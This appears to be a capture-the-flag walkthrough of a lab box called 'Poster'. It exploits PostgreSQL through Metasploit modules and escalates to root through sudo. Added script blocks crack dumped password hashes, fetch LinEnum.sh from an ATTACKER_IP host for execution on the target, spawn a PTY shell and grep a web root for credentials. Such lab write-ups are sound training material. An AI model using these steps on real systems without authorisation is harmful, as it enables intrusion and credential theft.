Poster

Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (-Pn) so nmap skips host discovery and scans even if the target drops ICMP echo requests:

nmap -Pn 10.10.65.15

Detailed nmap scan of the three ports the first scan reported open:

Command breakdown:

  • (-sV): Service and version detection

  • (-sC): Run the default nmap scripts

  • (-p 22,80,5432): Only scan ports 22 (SSH), 80 (HTTP) and 5432 (PostgreSQL)

  • (-oN nmap): Save the normal output to a file called nmap

nmap -sV -sC -p 22,80,5432 -oN nmap 10.10.65.15
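The two-stage scan above (a broad -Pn sweep, then -sV -sC on only the open ports) is easy to chain in a script. The following is an added example, not part of the original write-up: it assumes the first scan was also saved in grepable form with -oG, parses the open ports out of that file and prints the detailed-scan command. The gnmap content it parses is constructed to look like nmap's output for this host; nothing in it is taken from the real scan.

```bash
#!/bin/sh
# Added example (not from the original write-up). Chains the two nmap stages:
# read the open ports out of a grepable (-oG) first scan and build the
# detailed -sV -sC scan for just those ports.

# Print the open TCP ports from a -oG file as a comma-separated list.
open_ports_from_gnmap() {
    # The Ports field looks like: Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
    grep 'Ports:' "$1" \
        | sed 's/.*Ports: //; s/Ignored State.*//' \
        | tr ',' '\n' | tr -d ' \t' \
        | awk -F/ '$2 == "open" { print $1 }' \
        | sort -n | uniq | paste -sd, -
}

# Build the detailed scan command for a host and its open ports.
detailed_scan_cmd() {
    printf 'nmap -sV -sC -p %s -oN nmap %s\n' "$2" "$1"
}

# Write a constructed sample of what "nmap -Pn -oG initial.gnmap 10.10.65.15"
# would save. This is made up for the demo, not the real scan output; the
# filtered 8080 entry is there to show that only "open" ports are kept.
write_sample_gnmap() {
    cat > "$1" <<'EOF'
# Nmap 7.93 scan initiated as: nmap -Pn -oG initial.gnmap 10.10.65.15
Host: 10.10.65.15 ()    Status: Up
Host: 10.10.65.15 ()    Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 5432/open/tcp//postgresql///, 8080/filtered/tcp//http-proxy///    Ignored State: closed (996)
# Nmap done -- 1 IP address (1 host up) scanned
EOF
}

# Demo: parse the sample and print the command for the second stage.
SAMPLE=$(mktemp)
write_sample_gnmap "$SAMPLE"
PORTS=$(open_ports_from_gnmap "$SAMPLE")
printf 'open ports: %s\n' "$PORTS"
detailed_scan_cmd 10.10.65.15 "$PORTS"
rm -f "$SAMPLE"
```

On a real scan, save the first stage with -oG instead of reading the port list off the screen; the parser ignores filtered and closed entries, so the second stage only spends script time on ports that actually answered.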

Enumeration

We are told to go to Metasploit and look for an auxiliary module that lets us enumerate user credentials, so let's do that.

Let's start Metasploit:

msfconsole

Now let's look for the module. The service on 5432 is PostgreSQL, so search for the PostgreSQL modules (search postgres) and read the descriptions. The numbers below are positions in that search output and depend on the Metasploit version you run, so match on the description rather than the number.

The credential-enumeration module is the 4th one, so let's select it and set the options (RHOSTS to the target; the module brings its own default user and password lists).

Let's now run the module.

We have a valid username and password.

Let's answer the next two questions, as we have the answers.

Now we have to find the module that lets us run a command (a query) against the database with the credentials we just found.

It is number 6; let's select it and set the options (RHOSTS plus the username and password we just found).

Let's run it.

We have the PostgreSQL version, so we can answer the next two questions.

Next we have to find the module that dumps the user hashes.

This time it is number 8, so let's select it and set the same options.

Let's run it.

We get six usernames with their password hashes. We can answer the next two questions.
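Those hashes are not used again in the walkthrough, but a practitioner would want to know whether any of them crack. The following is an added example, not part of the original write-up or of Metasploit: it assumes the dumped hashes are in PostgreSQL's classic md5 format, where the stored value is "md5" followed by the hex MD5 of the password concatenated with the username (the username acts as the salt). The username, password and wordlist are constructed for the demo; the real hashes from the box are not reproduced here.

```bash
#!/bin/sh
# Added example (not from the original write-up): crack dumped PostgreSQL
# password hashes offline.  Assumes the classic md5 scheme, where pg_shadow
# stores "md5" + hex(md5(password || username)), i.e. the username is the
# salt.  The user, password and wordlist below are constructed for the demo.

# MD5 hex digest of stdin, with whichever tool the box has.
md5hex() {
    if command -v md5sum >/dev/null 2>&1; then md5sum | cut -d' ' -f1
    else openssl md5 | sed 's/.*= //'
    fi
}

# PostgreSQL md5 hash for USER PASSWORD: md5 + hex(md5(password || user)).
pg_md5_hash() {
    printf '%s%s' "$2" "$1" | md5hex | sed 's/^/md5/'
}

# Try each line of WORDLIST against USER's HASH; print the password on a hit,
# return 1 if nothing matched.
crack_pg_hash() {
    user=$1; target_hash=$2; wordlist=$3
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        if [ "$(pg_md5_hash "$user" "$candidate")" = "$target_hash" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Demo: hash a known password for a constructed user, then recover it.
demo() {
    wl=$(mktemp)
    printf '%s\n' password 123456 qwerty letmein > "$wl"
    target=$(pg_md5_hash alison letmein)
    echo "alison:$target"
    crack_pg_hash alison "$target" "$wl" || echo "no match in wordlist"
    rm -f "$wl"
}
demo
```

Because the only salt is the username, the same password gives a different hash for each user, but each candidate still costs one MD5, so a decent wordlist runs through a six-user dump in seconds. Newer PostgreSQL servers (14 and later by default) store SCRAM-SHA-256 verifiers instead, which start with SCRAM-SHA-256$ and need a SCRAM-aware cracker such as hashcat.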

Next we have to find the module that lets an authenticated user read files of their choosing from the server.

This time it is number 5; let's select it, set the options (including the path of the file to read) and run it.

Now we have to look for the module that gives arbitrary command execution on the host itself, not just queries inside the database.

It is number 2; let's select it and set the options. We can also answer the next two questions.

Let's run it.

Looking back at the usernames and credentials we found, we can use that command execution to list the home directory of one of those users.

One file looks interesting, so let's read it.

It holds the password, so let's SSH into the machine as that user.

Privilege Escalation

We cannot read the user flag and this user has no sudo rights, so let's run LinEnum.sh on the machine to look for interesting files. First we have to start an HTTP server on the attacking machine and download the script onto the victim.

If you are still in the shell obtained through the Metasploit module rather than SSH, you can stabilise it with this command (an SSH session already has a proper TTY and does not need it):

python3 -c 'import pty; pty.spawn("/bin/bash")'

Now let's download the file. Do it from /tmp: that directory is world-writable, whereas the directory you land in may not be writable by this user.

Let's make the script executable with chmod.

Now let's run it:

./LinEnum.sh
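The transfer in the steps above (HTTP server on the attacking machine, download from the victim into /tmp, chmod, run) is worth doing with an integrity check, so you know the script you are about to execute is the one you served. The following is an added example, not part of the original write-up: it runs both ends on one host over the loopback interface so it can be tried offline, with a constructed stand-in for LinEnum.sh. ATTACKER_IP is an assumption for the demo; on the real box you would serve on 0.0.0.0 and fetch from your own tun0 address instead of 127.0.0.1.

```bash
#!/bin/sh
# Added example (not from the original write-up): serve a script from the
# attacking machine, fetch it on the victim into a world-writable directory
# and verify its SHA-256 before making it executable.  For the offline demo
# both ends run on this host over 127.0.0.1 with a constructed stand-in for
# LinEnum.sh; ATTACKER_IP is an assumption, replace it with your tun0 address.

ATTACKER_IP=127.0.0.1

# Attacker side: serve DIR on PORT, bound to ADDR (0.0.0.0 on a real job).
# Prints the server's PID so it can be stopped later.
serve_dir() {
    dir=$1; port=$2; addr=${3:-0.0.0.0}
    ( cd "$dir" && exec python3 -m http.server "$port" --bind "$addr" ) >/dev/null 2>&1 &
    echo $!
}

# Victim side: download URL to DEST with whatever the box has.
fetch() {
    if command -v wget >/dev/null 2>&1; then wget -q -O "$2" "$1"
    elif command -v curl >/dev/null 2>&1; then curl -fsS -o "$2" "$1"
    else python3 -c 'import sys, urllib.request; urllib.request.urlretrieve(sys.argv[1], sys.argv[2])' "$1" "$2"
    fi
}

# SHA-256 of a file, hex digest only.
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then shasum -a 256 "$1" | cut -d' ' -f1
    else openssl dgst -sha256 "$1" | sed 's/.*= //'
    fi
}

# Ask the OS for a free loopback port so the demo never collides with anything.
free_port() {
    python3 -c 'import socket; s=socket.socket(); s.bind(("127.0.0.1",0)); print(s.getsockname()[1]); s.close()'
}

# Whole transfer: returns 0 only if the downloaded copy matches the served one.
transfer_demo() {
    src=$(mktemp -d); stage=$(mktemp -d)          # stage stands in for /tmp on the victim
    printf '#!/bin/sh\necho "constructed stand-in for LinEnum.sh"\n' > "$src/LinEnum.sh"
    port=$(free_port)
    pid=$(serve_dir "$src" "$port" "$ATTACKER_IP")
    tries=0
    until fetch "http://$ATTACKER_IP:$port/LinEnum.sh" "$stage/LinEnum.sh" 2>/dev/null; do
        tries=$((tries + 1))
        if [ "$tries" -ge 10 ]; then kill "$pid" 2>/dev/null; return 1; fi
        sleep 1                                    # server may not be listening yet
    done
    kill "$pid" 2>/dev/null
    want=$(sha256_of "$src/LinEnum.sh"); got=$(sha256_of "$stage/LinEnum.sh")
    if [ "$want" != "$got" ]; then
        echo "hash mismatch, not executing" >&2
        return 1
    fi
    chmod +x "$stage/LinEnum.sh"                   # only after the hash checks out
    echo "verified $got, ready to run $stage/LinEnum.sh"
    rm -rf "$src" "$stage"
}

transfer_demo
```

On the target the same check is just sha256sum LinEnum.sh on both sides and comparing the digests; a file pulled over unauthenticated HTTP on a shared lab network is not something to run blind, and the chmod +x step is the natural place to insist on the match.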

Long story short, I found nothing, and even linpeas turned up nothing interesting (maybe I was not looking at the right thing). Then I remembered there was a web server running on the machine, so I went to /var/www/html to look for clues and found an interesting file.

Lets read it.
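The automated enumerators had nothing to say about that file because they list interesting locations rather than read application configuration for you; a targeted grep over the web root is the cheap second pass that finds it. The following is an added example, not part of the original write-up: it builds a constructed web root with an obviously fake credential so it can run anywhere, and grep_credentials is the function you would point at /var/www/html on the box.

```bash
#!/bin/sh
# Added example (not from the original write-up): hunt for credentials in a
# web root once LinEnum/linpeas come back empty.  The directory tree built by
# make_sample_webroot is constructed for the demo; the password in it is fake.

# Print file:line:text for lines that look like a password or secret being
# set, restricted to the file types that usually hold application config.
grep_credentials() {
    grep -rniE \
        --include='*.php' --include='*.conf' --include='*.ini' \
        --include='*.env' --include='*.yml' --include='*.txt' \
        '(pass(word|wd)?|secret|pwd)[[:space:]]*[=:]' "$1" 2>/dev/null
}

# Build a small fake web root: one config file with a credential, plus
# noise (login form, CSS class, robots.txt) that must not be reported.
make_sample_webroot() {
    mkdir -p "$1/assets"
    cat > "$1/config.php" <<'EOF'
<?php
$db_host = "localhost";
$db_user = "web";
$db_password = "example-not-the-real-one";   // constructed for the demo
EOF
    cat > "$1/index.html" <<'EOF'
<html><body><form><p>Enter your password</p><input type="password"></form></body></html>
EOF
    cat > "$1/assets/style.css" <<'EOF'
.password-field { color: red; }
EOF
    printf 'User-agent: *\nDisallow: /secret-area/\n' > "$1/robots.txt"
}

# Demo: build the tree, grep it, clean up.
ROOT=$(mktemp -d)
make_sample_webroot "$ROOT"
grep_credentials "$ROOT"
rm -rf "$ROOT"
```

The pattern deliberately wants an assignment (= or :) right after the keyword, which is what keeps login forms, CSS and robots.txt out of the output; widen the include list if the site is not PHP.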

We have the password for the user Alison, so let's switch to that user with su.

This user does have sudo rights, so let's check what we are allowed to run (sudo -l).

It looks like we can run any command as root, so let's use sudo to switch to root.

We can now read the user flag and the root flag.
